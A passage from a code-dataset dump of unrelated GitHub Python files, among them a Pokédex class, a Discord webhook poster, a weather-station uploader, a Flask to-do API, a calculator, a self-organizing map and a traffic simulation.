int(input())\nss(s,n)\n","repo_name":"pabloschwarzenberg/grader","sub_path":"hito2_ej3/hito2_ej3_64c4462b12a78ca670f47a4cc61d6d23.py","file_name":"hito2_ej3_64c4462b12a78ca670f47a4cc61d6d23.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30590125142","text":"import csv\nimport random\n\n\n\nclass Pokemon:\n def __init__(self, id, name, type1, type2, generation, legendary, total):\n self.id = id\n self.name = name\n self.type1 = type1\n self.type2 = type2\n self.generation = generation\n self.legendary = bool(legendary)\n self.total = total\n\nclass Pokedex:\n def __init__(self, csv_file_path):\n self.pokemon_list = []\n self.load_data(csv_file_path)\n\n def load_data(self, csv_file_path):\n with open(csv_file_path, newline='') as file:\n reader = csv.DictReader(file)\n for row in reader:\n legendary = True if row['Legendary'] == \"True\" else False\n pokemon = Pokemon(\n id=row['#'],\n name=row['Name'],\n type1=row['Type 1'],\n type2=row['Type 2'],\n generation=int(row['Generation']),\n legendary=legendary,\n total=int(row['Total'])\n )\n self.pokemon_list.append(pokemon)\n\n def get_all_pokemon(self):\n return self.pokemon_list\n\n def get_pokemon_by_name(self, name):\n for pokemon in self.pokemon_list:\n if pokemon.name.lower() == name.lower():\n return pokemon\n return None\n \n def get_pokemon_by_search(self, name: str):\n if len(name) < 3:\n return []\n \n matching_pokemon = [pokemon for pokemon in self.pokemon_list if name.lower() in pokemon.name.lower()]\n return matching_pokemon\n\n def get_pokemon_by_id(self, id):\n id = str(id)\n for pokemon in self.pokemon_list:\n if str(pokemon.id) == id:\n return pokemon\n return None\n \n def get_pokemon_by_type1(self, type1):\n matching_pokemon = []\n for pokemon in self.pokemon_list:\n if pokemon.type1.lower() == type1.lower():\n matching_pokemon.append(pokemon)\n return matching_pokemon\n \n # Could use list comprehension instead\n # def get_pokemon_by_type1(self, type1):\n # return [pokemon for pokemon in self.pokemon_list if pokemon.type1.lower() == type1.lower()]\n \n def get_pokemon_by_type2(self, type2):\n matching_pokemon = []\n for pokemon in self.pokemon_list:\n if pokemon.type2.lower() == type2.lower():\n matching_pokemon.append(pokemon)\n return matching_pokemon\n \n def get_pokemon_by_type(self, type):\n matching_pokemon = []\n for pokemon in self.pokemon_list:\n if pokemon.type1.lower() == type.lower() or pokemon.type2.lower() == type.lower():\n matching_pokemon.append(pokemon)\n return matching_pokemon\n \n def get_pokemon_by_generation(self, generation):\n matching_pokemon = []\n for pokemon in self.pokemon_list:\n if pokemon.generation == generation:\n matching_pokemon.append(pokemon)\n return matching_pokemon\n \n def get_pokemon_by_legendary(self):\n legendary_pokemon = []\n for pokemon in self.pokemon_list:\n if pokemon.legendary: \n legendary_pokemon.append(pokemon)\n return legendary_pokemon\n \n def get_random_team(self):\n team_size = 6\n random_team = random.sample(self.pokemon_list, team_size)\n return random_team\n \n def get_strong_team(self):\n team_size = 6\n\n # Calculate the total stats for all Pokémon\n total_stats = [pokemon.total for pokemon in self.pokemon_list]\n\n # Determine the cutoff for the top 20% of total stats\n cutoff = int(len(total_stats) * 0.2)\n top_pokemon_indices = sorted(range(len(total_stats)), key=lambda i: total_stats[i], reverse=True)[:cutoff]\n\n # Sort the top indices again and select random Pokémon from the top 20%\n sorted_top_pokemon_indices = sorted(top_pokemon_indices)\n strong_team = random.sample([self.pokemon_list[i] for i in sorted_top_pokemon_indices], k=team_size)\n return strong_team\n \n def get_weak_team(self):\n team_size = 6\n\n # Calculate the total stats for all Pokémon\n total_stats = [pokemon.total for pokemon in self.pokemon_list]\n\n # Determine the cutoff for the lowest 20% of total stats\n cutoff = int(len(total_stats) * 0.2)\n lowest_pokemon_indices = sorted(range(len(total_stats)), key=lambda i: total_stats[i])[:cutoff]\n\n # Sort the lowest indices again and select unique Pokémon from the lowest 20%\n sorted_lowest_pokemon_indices = sorted(lowest_pokemon_indices)\n weak_team_indices = random.sample(sorted_lowest_pokemon_indices, k=team_size)\n weak_team = [self.pokemon_list[i] for i in weak_team_indices]\n return weak_team\n \n def get_legendary_team(self):\n team_size = 6\n\n # Get all legendary Pokémon\n legendary_pokemon = [pokemon for pokemon in self.pokemon_list if pokemon.legendary]\n\n # Select random legendary Pokémon for the team\n team = random.sample(legendary_pokemon, k=team_size)\n return team\n \n def get_rainbow_team(self):\n team = []\n\n # Random Fire type 1\n fire_pokemon = random.choice(self.get_pokemon_by_type1(\"Fire\"))\n team.append(fire_pokemon)\n\n # Random Fighting or Ground type 1\n fighting_ground_pokemon = random.choice(self.get_pokemon_by_type1(\"Fighting\") + self.get_pokemon_by_type1(\"Ground\"))\n team.append(fighting_ground_pokemon)\n\n # Random Electric type 1\n electric_pokemon = random.choice(self.get_pokemon_by_type1(\"Electric\"))\n team.append(electric_pokemon)\n\n # Random Grass type 1\n grass_pokemon = random.choice(self.get_pokemon_by_type1(\"Grass\"))\n team.append(grass_pokemon)\n\n # Random Water type 1\n water_pokemon = random.choice(self.get_pokemon_by_type1(\"Water\"))\n team.append(water_pokemon)\n\n # Random Poison or Ghost type 1\n poison_ghost_pokemon = random.choice(self.get_pokemon_by_type1(\"Poison\") + self.get_pokemon_by_type1(\"Ghost\"))\n team.append(poison_ghost_pokemon)\n\n return team\n\n\n\n\n\n","repo_name":"EdwardGHill/pokedex1","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18205410876","text":"#!/usr/bin/env python3\n\"\"\"Discoord webhook Sanchez images\"\"\"\n\n\n# import libraries\nimport os\nimport sys\nfrom discord_webhook import DiscordWebhook, DiscordEmbed\nimport wxcutils\n\n\ndef webhooks(w_config_path, w_config_file, w_site_config_file, w_imagesfile, w_satellite,\n w_location, w_colour, w_description):\n \"\"\"send data to webhooks as configured\"\"\"\n MY_LOGGER.debug('webhooks called with %s %s %s %s %s %s %s %s',\n w_config_path, w_config_file, w_site_config_file,\n w_imagesfile, w_satellite,\n w_location, w_colour, w_description)\n\n # convert w_colour from hex string to an int\n w_colour = int(w_colour, 16)\n\n w_config = wxcutils.load_json(w_config_path, w_config_file)\n w_site_config = wxcutils.load_json(w_config_path, w_site_config_file)\n\n MY_LOGGER.debug('Iterate through webhooks')\n for w_row in w_config['webhooks']:\n MY_LOGGER.debug('webhook last 3 chars = %s', w_row[len(w_row) - 3:])\n w_webhook = DiscordWebhook(url=w_row)\n\n # create embed object for webhook\n w_embed = DiscordEmbed(title=w_satellite, description=w_location, color=w_colour)\n\n # set image\n w_embed.set_image(url=w_imagesfile)\n\n # set footer\n w_embed.set_footer(text=w_config['footer'].replace('[SITE]', w_site_config['website']))\n\n # add fields to embed\n w_embed.add_embed_field(name='Satellite', value=':satellite_orbital:' + w_satellite)\n if w_description != '':\n w_embed.add_embed_field(name='Pass Description', value=w_description)\n\n # add embed object to webhook\n w_webhook.add_embed(w_embed)\n\n w_response = w_webhook.execute()\n MY_LOGGER.debug('response = %s', w_response)\n\n# setup paths to directories\nHOME = os.environ['HOME']\nAPP_PATH = HOME + '/wxcapture/'\nCODE_PATH = APP_PATH + 'process/'\nLOG_PATH = CODE_PATH + 'logs/'\nOUTPUT_PATH = APP_PATH + 'output/'\nIMAGE_PATH = OUTPUT_PATH + 'images/'\nWORKING_PATH = CODE_PATH + 'working/'\nCONFIG_PATH = CODE_PATH + 'config/'\n\n# start logging\nMODULE = 'discord'\nMY_LOGGER = wxcutils.get_logger(MODULE, LOG_PATH, MODULE + '.log')\nMY_LOGGER.debug('-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+')\nMY_LOGGER.debug('Execution start')\nMY_LOGGER.debug('APP_PATH = %s', APP_PATH)\nMY_LOGGER.debug('CODE_PATH = %s', CODE_PATH)\nMY_LOGGER.debug('LOG_PATH = %s', LOG_PATH)\nMY_LOGGER.debug('OUTPUT_PATH = %s', OUTPUT_PATH)\nMY_LOGGER.debug('IMAGE_PATH = %s', IMAGE_PATH)\nMY_LOGGER.debug('WORKING_PATH = %s', WORKING_PATH)\nMY_LOGGER.debug('CONFIG_PATH = %s', CONFIG_PATH)\n\n\ntry:\n # webhook\n MY_LOGGER.debug('Webhooking pass')\n # files are ~ 2MB, so can tweet full size image\n DISCORD_IMAGE_URL = 'https://kiwiweather.com/gk-2a/sanchez.jpg'\n MY_LOGGER.debug('discord_image_url = %s', DISCORD_IMAGE_URL)\n try:\n webhooks(CONFIG_PATH, 'config-discord.json', 'config.json',\n DISCORD_IMAGE_URL,\n 'GK-2A', 'Geostationary Image',\n 'ff0000',\n 'IR Image CLAHE-Sanchez processed')\n except:\n MY_LOGGER.critical('Discord exception handler: %s %s %s',\n sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2])\n\nexcept:\n MY_LOGGER.critical('Global exception handler: %s %s %s',\n sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2])\n\nMY_LOGGER.debug('Execution end')\nMY_LOGGER.debug('-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+')\n","repo_name":"wxcapture/wxcapture","sub_path":"gk-2a-code/wxcapture/process/discord.py","file_name":"discord.py","file_ext":"py","file_size_in_byte":3518,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"77"} +{"seq_id":"18092102758","text":"from navmazing import NavigateToSibling\nfrom widgetastic.widget import View\nfrom widgetastic_patternfly import Accordion\nfrom widgetastic_patternfly import Dropdown\n\nfrom cfme.base import Server\nfrom cfme.common import BaseLoggedInPage\nfrom cfme.utils.appliance.implementations.ui import CFMENavigateStep\nfrom cfme.utils.appliance.implementations.ui import navigator\nfrom widgetastic_manageiq import ManageIQTree\n\n\nclass ControlExplorerView(BaseLoggedInPage):\n\n @property\n def in_control_explorer(self):\n return (\n self.logged_in_as_current_user and\n self.navigation.currently_selected == ['Control', 'Explorer'])\n\n @property\n def is_displayed(self):\n return self.in_control_explorer\n\n @View.nested\n class policy_profiles(Accordion): # noqa\n ACCORDION_NAME = \"Policy Profiles\"\n\n tree = ManageIQTree()\n\n @View.nested\n class policies(Accordion): # noqa\n tree = ManageIQTree()\n\n @View.nested\n class events(Accordion): # noqa\n tree = ManageIQTree()\n\n @View.nested\n class conditions(Accordion): # noqa\n tree = ManageIQTree()\n\n @View.nested\n class actions(Accordion): # noqa\n tree = ManageIQTree()\n\n @View.nested\n class alert_profiles(Accordion): # noqa\n ACCORDION_NAME = \"Alert Profiles\"\n\n tree = ManageIQTree()\n\n @View.nested\n class alerts(Accordion): # noqa\n tree = ManageIQTree()\n\n configuration = Dropdown(\"Configuration\")\n\n\n@navigator.register(Server)\nclass ControlExplorer(CFMENavigateStep):\n VIEW = ControlExplorerView\n prerequisite = NavigateToSibling(\"LoggedIn\")\n\n def step(self, *args, **kwargs):\n self.view.navigation.select(\"Control\", \"Explorer\")\n","repo_name":"ManageIQ/integration_tests","sub_path":"cfme/control/explorer/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"77"} +{"seq_id":"29371883387","text":"import json\nimport requests\nimport os\nfrom json import encoder\n\nfrom customlogging import LogLevel, logKibana\nencodeObj = encoder.JSONEncoder()\ndevice_key = 'sound-detector'\n\n\nencoder = json\n\n\ndef register():\n logKibana(LogLevel.DEBUG, \"registering sender\")\n\n if os.environ.get(\"server_origin\") is None:\n raise RuntimeError(\"missing server_origin environment variable\")\n resp = requests.post(os.environ.get(\"server_origin\") + \"/rest/sender\", headers={\n 'content-type': 'application/json',\n \"http_x_forwarded_for\": \"192.168.178.___\"\n }, verify=False, data=encodeObj.encode({\n \"deviceKey\": device_key,\n \"name\": 'Audio Detection',\n \"description\": 'recognize audio and trigger depending on the context'\n }))\n logKibana(LogLevel.DEBUG, \"register request done\",\n args=dict(status=resp.status_code))\n if(resp.status_code != 200 and resp.status_code != 409):\n logKibana(LogLevel.ERROR, \"registering sender\", args=dict(\n text=resp.text, status=resp.status_code))\n","repo_name":"jonnytest1/homeautomation","sub_path":"clients/sound-detection/registration.py","file_name":"registration.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11602967276","text":"#!/usr/bin/env python3\n#$Header: /home/pi/WX/bin/RCS/getAnemometerData.py,v 1.3 2017/02/06 19:37:09 pi Exp pi $\n\nimport subprocess\nimport serial\nimport datetime\nimport time\nimport re\nimport os\n# The paho module was installed with: sudo pip3 install paho-mqtt\nimport paho.mqtt.publish as publish\nimport anemometerJson\n\ndatafile = '/home/pi/WX/data/anemometerData.txt'\ndatafile_json = '/home/pi/WX/data/anemometerData.json'\nawskey = '/home/pi/WX/aws/wx-website.pem'\ndokey = '/home/pi/WX/digitalOcean/do1_rsa'\nawsdatafile = '/home/ubuntu/WX/data/anemometerData.txt'\ndodatafile = '/home/ben/WX/data/anemometerData.txt'\n\n# -----------\n# Function to convert anemometer average voltage to wind speed in miles/hour\ndef convert (bytes) :\n voltageMin = 0.41\n voltageMax = 2.01\n speedMax = 32.0\n speed = 0.0 # meters/second\n string = str(bytes)\n results = re.findall('([\\d\\.\\d]+)', string)\n twoMinuteAverageVoltage = float(results[0])\n fiveSecondAverageVoltage = float(results[1])\n # Convert voltage values to wind speeds in mph (1 m/s = 2.23694 mph)\n if ( twoMinuteAverageVoltage <= voltageMin ) :\n windSpeed = 0.0 # Set wind speed to zero if voltage is less than or equal to the minimum value\n else :\n # For voltages above minimum value, use the linear relationship to calculate wind speed\n windSpeed = ((( twoMinuteAverageVoltage - voltageMin ) * speedMax ) / ( voltageMax - voltageMin ))\n if ( fiveSecondAverageVoltage <= voltageMin ) :\n gustSpeed = 0.0 # Set wind speed to zero if voltage is less than or equal to the minimum value\n else :\n # For voltages above minimum value, use the linear relationship to calculate wind speed\n gustSpeed = ((( fiveSecondAverageVoltage - voltageMin ) * speedMax ) / ( voltageMax - voltageMin ))\n return (round((windSpeed * 2.23694), 1), round((gustSpeed * 2.23694), 1))\n# -----------\n\n\n# -----------\ntext = \"A\"\n\ntry :\n # Open serial port and send the letter 'A' command to the Arduino\n ser = serial.Serial('/dev/ttyUSB0', 9600)\n time.sleep(0.1)\n ser.write(text.encode('utf-8'))\n time.sleep(0.1)\n # Read the data (bytes packet) coming back from the Arduino\n bytes = ser.readline()\n ser.close()\n #fv = open(\"/home/pi/WX/data/data_string.txt\", \"a\")\n #fv.write(str(bytes) + \"\\n\")\n #fv.close()\n # print(bytes)\n # Call conversion function to get wind speeds (average, gust)\n windSpeed, gustSpeed = convert(bytes)\n # print(windSpeed)\n # print(gustSpeed)\n # Timestamps\n # print('{:%Y-%m-%d %H:%M:%S}'.format(datetime.datetime.now()))\n ts = time.time()\n # print(round(ts, 1))\n # print(\"...\")\n # Write data to file, which will be sent to the AWS server\n f = open(\"%s\" % datafile, \"w\")\n f.write('{:%Y-%m-%d %H:%M:%S}'.format(datetime.datetime.now()))\n f.write(\",\" + str(round(ts, 1)) + \",\" + str(windSpeed) + \",\" + str(gustSpeed) + \"\\n\")\n f.close()\n # Create json data file\n anemometerJson.create_json(datafile)\n # Publish to local mosquitto MQTT server (this feeds home web server)\n publish.single(\"wind\", str(windSpeed) + \",\" + str(gustSpeed), hostname=\"192.168.1.102\")\n\nexcept :\n pass\n# -----------\n\n# Send file 'anemometerData.txt' to Amazon AWS t2.micro instance and Digital Ocean droplet using secure copy (scp)\n#result1 = subprocess.getoutput(\"scp -i /home/pi/WX/aws/wx-website.pem /home/pi/WX/data/anemometerData.txt ubuntu@35.164.26.176:/home/ubuntu/WX/data\")\n#time.sleep(3)\n#result1 = subprocess.getoutput(\"ssh -i /home/pi/WX/aws/wx-website.pem ubuntu@cspa16403.hopto.org docker cp /home/ubuntu/WX/data/anemometerData.txt wxdata:/datavolume1/data\")\n#result2 = subprocess.getoutput(\"scp -i /home/pi/WX/digitalOcean/do1_rsa /home/pi/WX/data/anemometerData.txt root@45.55.89.253:/home/ben/WX/data\")\n\n# New, more streamlined transfer of anemomter data to servers\n#-------\n# Send file to Amazon server\nresult = subprocess.getoutput('cat %s | ssh -i %s ubuntu@cspa16403.hopto.org \\\n\"cat > %s; docker cp %s wxdata:/datavolume1/data\"' % (datafile, awskey, awsdatafile, awsdatafile))\n# Send file to Digital Ocean server\nresult = subprocess.getoutput('cat %s | ssh -i %s root@wxben.ddns.net \\\n\"cat > %s\"' % (datafile, dokey, dodatafile))\n#-------\n\n# Update winddata.rrd database\ndevnull = open(os.devnull, 'w')\nsubprocess.call([\"/home/pi/WX/rrd/bin/update_wind_rrd.sh\"], stdout=devnull)\n\n# Send file to AWS S3 storage bucket\ndatafile_json_basename = os.path.basename(datafile_json)\nsubprocess.call([\"/usr/local/bin/aws\", \"s3\", \"cp\", datafile_json, \"s3://cspawx.ddns.net/data/\" + datafile_json_basename, \"--acl\", \"public-read\"], stdout=devnull)\ndevnull.close()\n","repo_name":"benrb3/S3-WX","sub_path":"getAnemometerData.py","file_name":"getAnemometerData.py","file_ext":"py","file_size_in_byte":4544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71718541370","text":"from flask import Flask,jsonify, request,abort \n\napp = Flask(__name__)\n\ntarefas = [\n {\n 'id': 1,\n 'titulo': u'Ir na padaria',\n 'descricao': u'trazer leite, pão e manteiga', \n 'done': True\n },\n {\n 'id': 2,\n 'titulo': u'Ir no mercado',\n 'descricao': u'trazer frutas, verduras e legumes', \n 'done': False\n }\n]\n\n@app.route('/tarefas', methods=['GET'])\ndef get_tasks():\n return jsonify({'tarefas': tarefas})\n\n\n##{\n##\t\"titulo\":\"Ir na feira\",\n##\t\"descricao\":\"trazer banana, maçã e limão\"\n##}\n\n@app.route('/new', methods=['POST'])\ndef new():\n content = request.json\n tit = content['titulo']\n desc = content['descricao']\n tarefas = [\n {\n 'id': 3,\n 'titulo': tit,\n 'descricao': desc, \n 'done': False\n }]\n \n return jsonify({'tarefas': tarefas})\n\nif __name__ == '__main__':\n app.run(\"0.0.0.0\", port=80, debug=True)\n","repo_name":"LuigiTavolaro/ApisPythonAzureWebAppsForContainers","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"9788885188","text":"import os\nimport time\n\n\n\ndef seperator():\n print(\"-\" * 30)\n\n\ndef print_menu():\n\n # is there a way to clear the console\n seperator()\n print('Welcome to PyCalc')\n seperator()\n\n print('[1] - Add')\n print('[2] - Subtract')\n print('[3] - Multiply')\n print('[4] - Divide')\n print('[x] - Close')\n\n seperator()\n\n\ndef clear_screen():\n os.system(\"cls\")\n\n\ndef sum(num1, num2):\n return num1 + num2\n\n\ndef Subtract(num1, num2):\n return num1 - num2\n\n\ndef Multiply(num1, num2):\n return num1 * num2\n\n\ndef Divide(num1, num2):\n\n if (num1, num2 == 0):\n return print('ZeroDivisionError: float division by zero')\n\n return num1 / num2\n time.sleep(3)\n clear_screen()\n\n\nopc = ''\nwhile (opc != 'x'):\n print_menu()\n opc = input('Please select an option: ')\n\n if (opc == 'x'):\n clear_screen()\n break # break = finish loop\n\n num1 = float(input('First number: '))\n num2 = float(input('Second number: '))\n\n if (opc == '1'):\n clear_screen()\n print(\"Result: \" + str(sum(num1, num2)))\n time.sleep(3)\n\n elif (opc == '2'):\n clear_screen()\n print(\"Result: \" + str(Subtract(num1, num2)))\n time.sleep(3)\n\n elif (opc == '3'):\n clear_screen()\n print(\"Result: \" + str(Multiply(num1, num2)))\n time.sleep(3)\n\n elif (opc == '4'):\n clear_screen()\n print(\"Result: \" + str(Divide(num1, num2)))\n time.sleep(3)\n\n\ninput('Press Enter to continue...')\n\nprint('Byte Byte!')\n\n\n\n\n# on div show error if the user tries to divide by 0]\n# return 0 from the fn\n","repo_name":"artlemus/python_calc","sub_path":"calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"35950262251","text":"import numpy as np\n\nfrom SelfOrganizingMap.NeighborhoodFunction.NeighborhoodFunction import NeighborhoodFunction\nfrom SelfOrganizingMap.Neuron import Neuron\nfrom util.MathUtil import euclidean_distance\nfrom printer import save_neurons_connections_over_data_points\n\n\nclass SelfOrganizingMap:\n\n def __init__(self, matrix_height: int, matrix_width: int, input_length: int,\n neighborhood_function: NeighborhoodFunction, learning_rate: float,\n minimum_tiredness_potential: float):\n self.neurons = self._init_neurons(matrix_height, matrix_width, input_length)\n self.matrix_height = matrix_height\n self.matrix_width = matrix_width\n self.neighborhood_function = neighborhood_function\n self.learning_rate = learning_rate\n self.minimum_tiredness_potential = minimum_tiredness_potential\n\n self._update_active_neurons()\n self.quantization_errors = []\n\n def react_to_input(self, vector: np.array):\n if len(self.active_neurons) != self.matrix_width * self.matrix_height:\n self._reset_neurons_tiredness()\n return self.find_closest_active_neuron(self, vector).weights\n\n def neurons_to_array(self):\n array = []\n for row in self.neurons:\n for neuron in row:\n array.append(neuron.weights)\n\n return np.array(array)\n\n @staticmethod\n def _init_neurons(matrix_height: int, matrix_width: int, dimension: int):\n return [[Neuron(dimension, x, y) for x in range(0, matrix_width)] for y in range(0, matrix_height)]\n\n def _calculate_quantization_error(self, data):\n self._reset_neurons_tiredness()\n data_sample = data[np.random.choice(np.arange(len(data)), int(len(data) / 10)), :]\n\n summed_distance = 0\n for d in data_sample:\n closest_neuron = SelfOrganizingMap.find_closest_active_neuron(self, d)\n summed_distance += euclidean_distance(d, closest_neuron.weights) ** 2\n\n return summed_distance / len(data_sample)\n\n def _reset_neurons_tiredness(self):\n active_neurons = []\n for x in range(self.matrix_height):\n for y in range(self.matrix_width):\n self.neurons[x][y].tiredness_potential = 1\n active_neurons.append(self.neurons[x][y])\n\n self.active_neurons = active_neurons\n\n def _update_neurons_tiredness(self, winner: Neuron):\n for x in range(self.matrix_height):\n for y in range(self.matrix_width):\n if self.neurons[x][y] == winner:\n winner.tiredness_potential -= self.minimum_tiredness_potential\n else:\n self.neurons[x][y].tiredness_potential += 0.1\n if self.neurons[x][y].tiredness_potential > 1:\n self.neurons[x][y].tiredness_potential = 1\n\n def _update_active_neurons(self):\n active_neurons = []\n for x in range(0, self.matrix_height):\n for y in range(0, self.matrix_width):\n if self.neurons[x][y].tiredness_potential > self.minimum_tiredness_potential:\n active_neurons.append(self.neurons[x][y])\n\n if len(active_neurons) == 0:\n for x in range(0, self.matrix_height):\n for y in range(0, self.matrix_width):\n self.neurons[x][y].tiredness_potential = 1\n active_neurons.append(self.neurons[x][y])\n\n self.active_neurons = active_neurons\n\n def learn(self, data, epochs: int, visualize=True):\n counter = 0\n for e in range(0, epochs):\n print('Epoch = ', e)\n self.quantization_errors.append(self._calculate_quantization_error(data))\n np.random.shuffle(data)\n learning_speed = self.learning_rate / (1 + e / epochs)\n for d in data:\n if visualize and counter % 100 == 0:\n save_neurons_connections_over_data_points(self, data, str(counter))\n counter += 1\n\n closest_neuron: Neuron = self.find_closest_active_neuron(self, d)\n self.neighborhood_function.apply(self, closest_neuron, learning_speed, d)\n self._update_neurons_tiredness(closest_neuron)\n self._update_active_neurons()\n self.quantization_errors.append(self._calculate_quantization_error(data))\n\n @staticmethod\n def find_closest_active_neuron(self, data):\n closest_neuron = self.active_neurons[0]\n smallest_distance = euclidean_distance(closest_neuron.weights, data)\n\n for n in self.active_neurons:\n distance = euclidean_distance(n.weights, data)\n if distance < smallest_distance:\n closest_neuron = n\n smallest_distance = distance\n return closest_neuron\n\n def activation_count_map(self, data):\n activation = np.zeros((self.matrix_width, self.matrix_height))\n for d in data:\n winner = self.find_closest_active_neuron(self, d)\n activation[winner.x][winner.y] += 1\n return activation\n\n def distance_map(self):\n pass\n","repo_name":"ArturPrzybysz/Clustering","sub_path":"src/SelfOrganizingMap/SelfOrganizingMap.py","file_name":"SelfOrganizingMap.py","file_ext":"py","file_size_in_byte":5142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73361423609","text":"# coding = utf-8\nfrom simulation import *\n# Change next line with the map you want to use\nfrom maps.map_from_data import *\nfrom time import *\nfrom math import exp\nimport decimal\n\n# Discretize time\ndecimal.getcontext().prec = 8 # Set the precision for the decimal module\nt = decimal.Decimal(0)\ndt_s = decimal.Decimal(1)/decimal.Decimal(100)\ndt_g = 100 # [ms] # Time interval for graphic update()\n\ndelay = 0\naverage_speed = 0\n\n# file = open(\"results.txt\", \"w\")\n\ndef next_steps(dt_d, steps):\n \"\"\"Update all the simulation :\n - vehicle acceleration, velocity and position\n - vehicle crossing order for each cross according to the priority\n - traffic light state \"\"\"\n T = perf_counter()\n global t\n global average_speed\n dt = float(dt_d)\n\n # if t == 0 or t == 2 or t == 4 :\n # veh = Vehicle(roads[0], crosses[0])\n # vehicles.append(veh)\n # roads[0].incoming_veh(veh, crosses[0])\n\n for i in range(steps):\n # file.write(\"{}\\t\".format(t))\n average_speed = 0\n # Generate vehicles\n for gen in generators:\n gen.generate(t)\n\n for cross in crosses:\n cross.updateTrafficLights(t)\n cross.get_intentions()\n\n # Update acceleration, speed and position of each vehicle\n for veh in vehicles:\n try:\n a = veh.acceleration_IIDM()\n veh.x += veh.v*dt + max(0, 0.5*a*dt*dt)\n veh.v = max(0, veh.v + a*dt)\n average_speed += veh.v\n\n # file.write(\"{} {} {} \".format(a, veh.v, veh.x))\n\n if veh.slow_down > 1:\n veh.slow_down -= 1\n elif veh.slow_down == 1:\n veh.slow_down = 0\n veh.v0 = veh.road.speed_limit\n\n if (veh.road.length - veh.x) <= ((veh.v*veh.v)/(2*veh.b_max) + 30) and veh.slow_down == 0 :\n veh.turn_speed()\n\n if veh.leader != None and veh.leader.veh_type != \"stop\" and veh.leader.road == veh.road and veh.destination_cross != veh.leader.destination_cross:\n veh.decision = False\n veh.find_leader()\n\n except:\n next_road_id = None if veh.next_road == None else veh.next_road.id\n leader_index = None if veh.leader == None or veh.leader.veh_type == \"stop\" else vehicles.index(veh.leader)\n\n print(\"ERROR DURING THE SIMULATION, while working on {}, going from road {} to {}, following {} on {}, spacing: {}\"\n .format(vehicles.index(veh), veh.road.id, next_road_id, leader_index, veh.leader.road.id, veh.spacing_with_leader()))\n raise\n\n # file.write(\"\\n\")\n\n if len(vehicles) > 0:\n average_speed = (average_speed / len(vehicles)) * 3.6\n\n # Check if the vehicles must change road\n for road in roads:\n road.outgoing_veh(road.first_vehicle(road.cross1))\n road.outgoing_veh(road.first_vehicle(road.cross2))\n\n for veh in deleted_vehicles:\n # Delete the vehicles that left the map\n gui.map.delete(veh.rep)\n gui.map.delete(veh.brake_rep)\n deleted_vehicles.clear()\n\n t+= dt_d\n\n global delay\n delay = perf_counter() - T\n\ndef update():\n \"\"\"Update the graphic interface :\n Compute the correct number of simulation steps\n Update the position of the vehicles, the traffic lights and the leadership arrows\"\"\"\n\n global delay\n global average_speed\n T = perf_counter()\n if gui.controls.play.get():\n next_steps(dt_s, int((dt_g/(1000*float(dt_s)))*gui.controls.speed.get()))\n gui.map.draw_vehicle(vehicles)\n gui.map.draw_traffic_lights(crosses)\n gui.controls.time_str.set(\"Current time : \" + str(t) + \" s.\")\n gui.controls.nb_veh.set(len(vehicles))\n gui.controls.avg_speed.set(\"{:.4f}\".format(average_speed))\n mouseover()\n if gui.controls.leadership.get():\n gui.map.draw_leadership(vehicles)\n else:\n gui.map.delete(\"leadership\")\n delay += perf_counter() - T + delay\n gui.map.after(int(dt_g * exp(-delay*1000/dt_g)), update)\n else:\n mouseover()\n gui.map.after(dt_g, update)\n if gui.controls.leadership.get():\n gui.map.draw_leadership(vehicles)\n else:\n gui.map.delete(\"leadership\")\n\n\nmouse_x, mouse_y = 0, 0\n\ndef click(event):\n \"\"\"Slow down a vehicle when clicking on it\"\"\"\n x, y = gui.map.canvasx(event.x), gui.map.canvasy(event.y)\n objects = gui.map.find_overlapping(x,y,x,y)\n for obj in objects:\n tags = gui.map.gettags(obj)\n if \"vehicle\" in tags:\n for veh in vehicles:\n if veh.rep == obj:\n veh.v0 = veh.v/3\n veh.slow_down = 10*int(1/dt_s)\n break\n\ndef mouseover():\n \"\"\"Update the text to give information to the user\"\"\"\n x, y = gui.map.canvasx(mouse_x), gui.map.canvasy(mouse_y)\n objects = gui.map.find_overlapping(x,y,x,y)\n txt = \"\"\n for obj in objects:\n tags = gui.map.gettags(obj)\n if \"road\" in tags:\n for road in roads:\n if road.rep == obj:\n txt = txt + \"Road {} (angle: {:.2f}) \".format(roads.index(road), road.angle)\n break\n elif \"cross\" in tags:\n for cross in crosses:\n if cross.rep == obj:\n txt = txt + \"Cross \" + str(crosses.index(cross)) + \" \"\n break\n elif \"vehicle\" in tags:\n for veh in vehicles:\n if veh.rep == obj:\n next_road_id = None if veh.next_road == None else veh.next_road.id\n leader_index = None if veh.leader == None or veh.leader.veh_type == \"stop\" else vehicles.index(veh.leader)\n leader_index = \"stop\" if veh.leader != None and veh.leader.veh_type == \"stop\" else leader_index\n txt = txt + \"Vehicle {} \\n(speed: {:.2f}, v0: {:.2f}, d_to_cross: {:.2f}, going to: {}, leader: {}, decision: {})\".format(vehicles.index(veh), veh.v*3.6, veh.v0*3.6, veh.d_to_cross(), next_road_id, leader_index, veh.decision)\n break\n gui.map.itemconfigure(tag, text=txt)\n gui.map.coords(tag, x+15, y+15)\n\ndef moved(event):\n global mouse_x, mouse_y\n mouse_x, mouse_y = event.x, 